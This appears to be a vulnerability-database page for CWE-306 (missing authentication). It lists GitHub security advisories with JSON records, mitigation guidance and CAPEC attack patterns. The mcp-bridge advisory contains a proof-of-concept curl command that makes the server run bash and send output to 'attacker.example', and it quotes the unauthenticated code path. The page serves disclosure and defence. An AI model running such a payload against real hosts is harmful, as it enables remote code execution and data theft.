CWE-306
AllowedMissing Authentication for Critical Function
Abstraction: Base · Status: Draft
The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
3449 vulnerabilities reference this CWE, most recent first.
GHSA-WR2V-9RPQ-C35Q
Vulnerability from github – Published: 2024-01-31 00:21 – Updated: 2024-01-31 00:21Vulnerability type
Cryptography
Workarounds
Refer to the gateway documentation. The vulnerability was spotted due to unclear documentation of how the gateway handles endpoints validation.
Detail
When starting a gateway, TLS authentication will only be attempted on endpoints identified in DNS SRV records for a given domain, which occurs in the discoverEndpoints function. No authentication is performed against endpoints provided in the --endpoints flag. The auditors has noted that appropriate documentation of this validation functionality plus deprecation of this misleading functionality is an acceptable path forward.
References
Find out more on this vulnerability in the security audit report
For more information
If you have any questions or comments about this advisory: * Contact the etcd security committee
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.4.9"
},
"package": {
"ecosystem": "Go",
"name": "go.etcd.io/etcd"
},
"ranges": [
{
"events": [
{
"introduced": "3.4.0-rc.0"
},
{
"fixed": "3.4.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "go.etcd.io/etcd"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.23"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-15136"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-31T00:21:56Z",
"nvd_published_at": "2020-08-06T23:15:00Z",
"severity": "MODERATE"
},
"details": "### Vulnerability type\nCryptography\n\n### Workarounds\nRefer to the [gateway documentation](https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md). The vulnerability was spotted due to unclear documentation of how the gateway handles endpoints validation.\n\n### Detail\nWhen starting a gateway, TLS authentication will only be attempted on endpoints identified in DNS SRV records for a given domain, which occurs in the discoverEndpoints function. No authentication is performed against endpoints provided in the --endpoints flag. The auditors has noted that appropriate documentation of this validation functionality plus deprecation of this misleading functionality is an acceptable path forward.\n \n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)",
"id": "GHSA-wr2v-9rpq-c35q",
"modified": "2024-01-31T00:21:56Z",
"published": "2024-01-31T00:21:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-wr2v-9rpq-c35q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15136"
},
{
"type": "WEB",
"url": "https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Etcd Gateway TLS authentication only applies to endpoints detected in DNS SRV records"
}
GHSA-WR36-4M3G-VX95
Vulnerability from github – Published: 2026-03-18 18:31 – Updated: 2026-03-18 18:31The "Privileged Helper" component of the Arturia Software Center (MacOS) does not perform sufficient client code signature validation when a client connects. This leads to an attacker being able to connect to the helper and execute privileged actions leading to local privilege escalation.
{
"affected": [],
"aliases": [
"CVE-2026-24062"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-18T16:16:26Z",
"severity": "HIGH"
},
"details": "The \"Privileged Helper\" component of the Arturia Software Center (MacOS) does not perform sufficient client code signature validation when a client connects.\u00a0This leads to an attacker being able to connect to the helper and execute privileged actions leading to local privilege escalation.",
"id": "GHSA-wr36-4m3g-vx95",
"modified": "2026-03-18T18:31:15Z",
"published": "2026-03-18T18:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24062"
},
{
"type": "WEB",
"url": "https://r.sec-consult.com/arturia"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WR93-5PFW-4C2V
Vulnerability from github – Published: 2024-10-15 12:30 – Updated: 2025-01-24 09:30An unauthenticated remote attacker can get read access to files in the "/tmp" directory due to missing authentication.
{
"affected": [],
"aliases": [
"CVE-2024-45276"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-15T11:15:12Z",
"severity": "HIGH"
},
"details": "An unauthenticated remote attacker can get read access to files in the \"/tmp\" directory due to missing authentication.",
"id": "GHSA-wr93-5pfw-4c2v",
"modified": "2025-01-24T09:30:44Z",
"published": "2024-10-15T12:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45276"
},
{
"type": "WEB",
"url": "https://cert.vde.com/en/advisories/VDE-2024-056"
},
{
"type": "WEB",
"url": "https://cert.vde.com/en/advisories/VDE-2024-066"
},
{
"type": "WEB",
"url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-065.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WRX7-MG98-47QJ
Vulnerability from github – Published: 2025-11-18 15:30 – Updated: 2025-11-18 15:30A missing authentication enforcement vulnerability exists in the mutual TLS (mTLS) implementation used by System REST APIs and SOAP services in multiple WSO2 products. Due to improper validation of client certificate–based authentication in certain default configurations, the affected components may permit unauthenticated requests even when mTLS is enabled. This condition occurs when relying on the default mTLS settings for System REST APIs or when the mTLS authenticator is enabled for SOAP services, causing these interfaces to accept requests without enforcing additional authentication.
Successful exploitation allows a malicious actor with network access to the affected endpoints to gain administrative privileges and perform unauthorized operations. The vulnerability is exploitable only when the impacted mTLS flows are enabled and accessible in a given deployment. Other certificate-based authentication mechanisms such as Mutual TLS OAuth client authentication and X.509 login flows are not affected, and APIs served through the API Gateway of WSO2 API Manager remain unaffected.
{
"affected": [],
"aliases": [
"CVE-2025-9312"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-18T15:16:38Z",
"severity": "CRITICAL"
},
"details": "A missing authentication enforcement vulnerability exists in the mutual TLS (mTLS) implementation used by System REST APIs and SOAP services in multiple WSO2 products. Due to improper validation of client certificate\u2013based authentication in certain default configurations, the affected components may permit unauthenticated requests even when mTLS is enabled. This condition occurs when relying on the default mTLS settings for System REST APIs or when the mTLS authenticator is enabled for SOAP services, causing these interfaces to accept requests without enforcing additional authentication.\n\nSuccessful exploitation allows a malicious actor with network access to the affected endpoints to gain administrative privileges and perform unauthorized operations. The vulnerability is exploitable only when the impacted mTLS flows are enabled and accessible in a given deployment. Other certificate-based authentication mechanisms such as Mutual TLS OAuth client authentication and X.509 login flows are not affected, and APIs served through the API Gateway of WSO2 API Manager remain unaffected.",
"id": "GHSA-wrx7-mg98-47qj",
"modified": "2025-11-18T15:30:56Z",
"published": "2025-11-18T15:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9312"
},
{
"type": "WEB",
"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4494"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WVFH-FC5M-V972
Vulnerability from github – Published: 2022-05-24 19:02 – Updated: 2022-05-24 19:02In multiple managed switches by WAGO in different versions without authorization and with specially crafted packets it is possible to create users.
{
"affected": [],
"aliases": [
"CVE-2021-20998"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-13T14:15:00Z",
"severity": "CRITICAL"
},
"details": "In multiple managed switches by WAGO in different versions without authorization and with specially crafted packets it is possible to create users.",
"id": "GHSA-wvfh-fc5m-v972",
"modified": "2022-05-24T19:02:22Z",
"published": "2022-05-24T19:02:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20998"
},
{
"type": "WEB",
"url": "https://cert.vde.com/en-us/advisories/vde-2021-013"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-WVHJ-3792-HF6C
Vulnerability from github – Published: 2024-11-09 03:30 – Updated: 2026-04-08 18:33The CE21 Suite plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.2.0. This is due to hardcoded encryption key in the 'ce21_authentication_phrase' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.
{
"affected": [],
"aliases": [
"CVE-2024-10284"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-09T03:15:03Z",
"severity": "CRITICAL"
},
"details": "The CE21 Suite plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.2.0. This is due to hardcoded encryption key in the \u0027ce21_authentication_phrase\u0027 function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.",
"id": "GHSA-wvhj-3792-hf6c",
"modified": "2026-04-08T18:33:39Z",
"published": "2024-11-09T03:30:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10284"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/ce21-suite/trunk/single-sign-on-ce21.php?rev=3097700#L242"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3205463/ce21-suite#file3"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/45d66743-300e-480d-98b8-99dc30b6e786?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WVMG-W3GM-RJFX
Vulnerability from github – Published: 2025-11-15 00:30 – Updated: 2025-11-15 00:30Denver SHO-110 IP cameras expose a secondary HTTP service on TCP port 8001 that provides access to a '/snapshot' endpoint without authentication. While the primary web interface on port 80 enforces authentication, the backdoor service allows any remote attacker to retrieve image snapshots by directly requesting the 'snapshot' endpoint. An attacker can repeatedly collect snapshots and reconstruct the camera stream, compromising the confidentiality of the monitored environment.
{
"affected": [],
"aliases": [
"CVE-2021-4469"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-14T23:15:42Z",
"severity": "HIGH"
},
"details": "Denver SHO-110 IP cameras expose a secondary HTTP service on TCP port 8001 that provides access to a \u0027/snapshot\u0027 endpoint without authentication. While the primary web interface on port 80 enforces authentication, the backdoor service allows any remote attacker to retrieve image snapshots by directly requesting the \u0027snapshot\u0027 endpoint. An attacker can repeatedly collect snapshots and reconstruct the camera stream, compromising the confidentiality of the monitored environment.",
"id": "GHSA-wvmg-w3gm-rjfx",
"modified": "2025-11-15T00:30:26Z",
"published": "2025-11-15T00:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4469"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/50162"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/denver-sho-110-ip-camera-unauthenticated-snapshot-access"
},
{
"type": "WEB",
"url": "http://old.denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-WVQM-VF4G-854V
Vulnerability from github – Published: 2022-05-13 01:21 – Updated: 2022-05-13 01:21Under certain circumstances, SAP HANA Extended Application Services, advanced model (XS advanced) does not perform authentication checks properly for XS advanced platform and business users. Fixed in 1.0.97 to 1.0.99 (running on SAP HANA 1 or SAP HANA 2 SPS0 (second S stands for stack)).
{
"affected": [],
"aliases": [
"CVE-2019-0261"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-02-15T18:29:00Z",
"severity": "CRITICAL"
},
"details": "Under certain circumstances, SAP HANA Extended Application Services, advanced model (XS advanced) does not perform authentication checks properly for XS advanced platform and business users. Fixed in 1.0.97 to 1.0.99 (running on SAP HANA 1 or SAP HANA 2 SPS0 (second S stands for stack)).",
"id": "GHSA-wvqm-vf4g-854v",
"modified": "2022-05-13T01:21:12Z",
"published": "2022-05-13T01:21:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0261"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/2742027"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=510922943"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/106986"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WVR4-3WQ4-GPC5
Vulnerability from github – Published: 2026-03-19 12:51 – Updated: 2026-03-19 12:51Summary
When AUTH_TOKEN and ACCESS_TOKEN environment variables are not set (which is the default out-of-the-box configuration) the /bridge HTTP endpoint is completely unauthenticated. Any network-accessible caller can POST a request with an attacker-controlled serverPath and args payload, causing the server to spawn an arbitrary OS process as the user running mcp-bridge. This results in full remote code execution on the host without any credentials.
Details
Root cause 1 - Authentication not enforced when token is absent src/config/config.ts line 161 sets authToken to an empty string when neither environment variable is configured:
authToken: process.env.AUTH_TOKEN || process.env.ACCESS_TOKEN || '',
The auth middleware in src/server/http-server.ts lines 118–141 wraps all enforcement in if (this.accessToken). Because an empty string is falsy in JavaScript, the entire block is skipped and next() is called unconditionally for every request:
if (this.accessToken) {
// ... token validation - never reached when token is ''}
next(); // always reached in default config
The only consequence of a missing token is a log warning (line 42–43). The server starts and serves requests normally.
Root cause 2 - /bridge spawns arbitrary processes from request body input src/server/http-server.ts lines 194 and 218/227 extract serverPath and args directly from the untrusted JSON body and pass them to MCPClientManager.createClient() without any validation:
const { serverPath, method, params, args, env } = req.body;
// ...
clientId = await this.mcpClient.createClient(serverPath, args, env);
src/client/mcp-client-manager.ts lines 68–75 fall through to StdioClientTransport for any value that is not a valid HTTP/WS URL, using serverPath as the executable command verbatim:
transport = new StdioClientTransport({
command: serverPath,
args: args || [],
env: { ...getDefaultEnvironment(), ...(env || {}) }
});
There is no allow-list, no path restriction, and no sanitization. Any binary reachable from the server's PATH (including bash, sh, python, node, etc) can be invoked with arbitrary arguments.
Exposure surface
Express's app.listen(port) binds to all interfaces (0.0.0.0) by default, making the service immediately reachable over the network on any cloud VM or container. The project additionally ships an explicit start:tunnel npm script that uses ngrok to publish the server to a public internet URL, maximising the attack surface.
PoC
Start the server with no auth token configured (the default):
npm run build && npm start
# No AUTH_TOKEN set — server starts on port 3000, all interfaces
Send a crafted request from any machine that can reach port 3000:
curl -X POST http://<host>:3000/bridge \
-H 'Content-Type: application/json' \
-d '{
"serverPath": "bash",
"args": ["-lc", "id > /tmp/pwned && curl -d @/tmp/pwned https://attacker.example/exfil"],
"method": "tools/list",
"params": {}
}'
The server spawns bash as the mcp-bridge process user. The command executes, the file is written, and the HTTP response will contain the error from the MCP handshake failing (but the payload has already run). For internet-exposed instances (tunnel mode), replace with the ngrok public URL.
Impact
Any unauthenticated attacker with network access to the server can execute arbitrary OS commands as the user running mcp-bridge. This permits full host compromise including: credential and secret theft from the environment, installation of persistent backdoors, lateral movement to internal systems, and complete data destruction. Deployments most at risk are:
- Instances started with npm run start:tunnel or npm run dev:tunnel (direct internet exposure via ngrok)
- Any instance running on a cloud VM, container, or host without a network firewall restricting port 3000
The vulnerability is trivially exploitable with a single curl command and requires no prior knowledge of the target beyond its IP address and port.
Remediation
- Treat a missing AUTH_TOKEN as a fatal startup error. Replace the warning at http-server.ts:41–43 with a thrown exception so the server refuses to start without a configured secret.
- Invert the auth guard logic. Deny all requests when authToken is empty rather than allowing them.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "mcp-bridge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-19T12:51:28Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nWhen _AUTH_TOKEN_ and _ACCESS_TOKEN_ environment variables are not set (which is the default out-of-the-box configuration) the _/bridge_ HTTP endpoint is completely unauthenticated. Any network-accessible caller can POST a request with an attacker-controlled serverPath and args payload, causing the server to spawn an arbitrary OS process as the user running mcp-bridge. This results in full remote code execution on the host without any credentials.\n\n### Details\n**Root cause 1 - Authentication not enforced when token is absent**\n_src/config/config.ts_ line 161 sets authToken to an empty string when neither environment variable is configured:\n```\nauthToken: process.env.AUTH_TOKEN || process.env.ACCESS_TOKEN || \u0027\u0027,\n```\nThe auth middleware in _src/server/http-server.ts_ lines 118\u2013141 wraps all enforcement in if (_this.accessToken_). Because an empty string is falsy in JavaScript, the entire block is skipped and next() is called unconditionally for every request:\n```\nif (this.accessToken) { \n// ... token validation - never reached when token is \u0027\u0027}\nnext(); // always reached in default config\n```\nThe only consequence of a missing token is a log warning (line 42\u201343). The server starts and serves requests normally.\n\n**Root cause 2 - _/bridge_ spawns arbitrary processes from request body input**\n_src/server/http-server.ts_ lines 194 and 218/227 extract _serverPath_ and _args_ directly from the untrusted JSON body and pass them to _MCPClientManager.createClient()_ without any validation:\n```\nconst { serverPath, method, params, args, env } = req.body;\n// ...\nclientId = await this.mcpClient.createClient(serverPath, args, env);\n```\n_src/client/mcp-client-manager.ts_ lines 68\u201375 fall through to _StdioClientTransport_ for any value that is not a valid HTTP/WS URL, using _serverPath_ as the executable command verbatim:\n```\ntransport = new StdioClientTransport({ \ncommand: serverPath, \nargs: args || [], \nenv: { ...getDefaultEnvironment(), ...(env || {}) }\n});\n```\nThere is no allow-list, no path restriction, and no sanitization. Any binary reachable from the server\u0027s PATH (including bash, sh, python, node, etc) can be invoked with arbitrary arguments.\n\n#### Exposure surface\nExpress\u0027s _app.listen(port)_ binds to all interfaces _(0.0.0.0)_ by default, making the service immediately reachable over the network on any cloud VM or container. The project additionally ships an explicit _start:tunnel_ npm script that uses ngrok to publish the server to a public internet URL, maximising the attack surface.\n\n### PoC\nStart the server with no auth token configured (the default):\n```\nnpm run build \u0026\u0026 npm start\n# No AUTH_TOKEN set \u2014 server starts on port 3000, all interfaces\n```\nSend a crafted request from any machine that can reach port 3000:\n```\ncurl -X POST http://\u003chost\u003e:3000/bridge \\ \n-H \u0027Content-Type: application/json\u0027 \\ \n-d \u0027{ \n\"serverPath\": \"bash\", \n\"args\": [\"-lc\", \"id \u003e /tmp/pwned \u0026\u0026 curl -d @/tmp/pwned https://attacker.example/exfil\"], \n\"method\": \"tools/list\", \n\"params\": {} \n}\u0027\n```\nThe server spawns _bash_ as the _mcp-bridge_ process user. The command executes, the file is written, and the HTTP response will contain the error from the MCP handshake failing (but the payload has already run).\nFor internet-exposed instances (tunnel mode), replace _\u003chost\u003e_ with the ngrok public URL.\n\n### Impact\nAny unauthenticated attacker with network access to the server can execute arbitrary OS commands as the user running _mcp-bridge._ This permits full host compromise including: credential and secret theft from the environment, installation of persistent backdoors, lateral movement to internal systems, and complete data destruction.\nDeployments most at risk are:\n\n- Instances started with _npm run start:tunnel_ or _npm run dev:tunnel_ (direct internet exposure via ngrok)\n- Any instance running on a cloud VM, container, or host without a network firewall restricting port 3000\n\nThe vulnerability is trivially exploitable with a single curl command and requires no prior knowledge of the target beyond its IP address and port.\n\n\n### Remediation\n\n1. Treat a missing _AUTH_TOKEN_ as a fatal startup error. Replace the warning at _http-server.ts:41\u201343_ with a thrown exception so the server refuses to start without a configured secret.\n2. Invert the auth guard logic. Deny all requests when _authToken_ is empty rather than allowing them.",
"id": "GHSA-wvr4-3wq4-gpc5",
"modified": "2026-03-19T12:51:28Z",
"published": "2026-03-19T12:51:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/EvalsOne/MCP-connect/security/advisories/GHSA-wvr4-3wq4-gpc5"
},
{
"type": "PACKAGE",
"url": "https://github.com/EvalsOne/MCP-connect"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "MCP Connect has unauthenticated remote OS command execution via /bridge endpoint"
}
GHSA-WVW6-W9QQ-28X5
Vulnerability from github – Published: 2022-05-24 17:05 – Updated: 2022-05-24 17:05This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link DCS-960L v1.07.102. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HNAP service, which listens on TCP port 80 by default. When parsing the SOAPAction request header, the process does not properly validate the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-8458.
{
"affected": [],
"aliases": [
"CVE-2019-17146"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-01-07T23:15:00Z",
"severity": "HIGH"
},
"details": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link DCS-960L v1.07.102. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HNAP service, which listens on TCP port 80 by default. When parsing the SOAPAction request header, the process does not properly validate the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-8458.",
"id": "GHSA-wvw6-w9qq-28x5",
"modified": "2022-05-24T17:05:52Z",
"published": "2022-05-24T17:05:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17146"
},
{
"type": "WEB",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10142"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-19-1031"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation
- Divide the software into anonymous, normal, privileged, and administrative areas. Identify which of these areas require a proven user identity, and use a centralized authentication capability.
- Identify all potential communication channels, or other means of interaction with the software, to ensure that all channels are appropriately protected, including those channels that are assumed to be accessible only by authorized parties. Developers sometimes perform authentication at the primary channel, but open up a secondary channel that is assumed to be private. For example, a login mechanism may be listening on one network port, but after successful authentication, it may open up a second port where it waits for the connection, but avoids authentication because it assumes that only the authenticated party will connect to the port.
- In general, if the software or protocol allows a single session or user state to persist across multiple connections or channels, authentication and appropriate credential management need to be used throughout.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation
- Where possible, avoid implementing custom, "grow-your-own" authentication routines and consider using authentication capabilities as provided by the surrounding framework, operating system, or environment. These capabilities may avoid common weaknesses that are unique to authentication; support automatic auditing and tracking; and make it easier to provide a clear separation between authentication tasks and authorization tasks.
- In environments such as the World Wide Web, the line between authentication and authorization is sometimes blurred. If custom authentication routines are required instead of those provided by the server, then these routines must be applied to every single page, since these pages could be requested directly.
Mitigation MIT-4.5
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using libraries with authentication capabilities such as OpenSSL or the ESAPI Authenticator [REF-45].
Mitigation
When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to require strong authentication for users who should be allowed to access the data [REF-1297] [REF-1298] [REF-1302].
CAPEC-12: Choosing Message Identifier
This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.
CAPEC-166: Force the System to Reset Values
An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.
CAPEC-216: Communication Channel Manipulation
An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.
CAPEC-36: Using Unpublished Interfaces or Functionality
An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.
CAPEC-62: Cross Site Request Forgery
An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.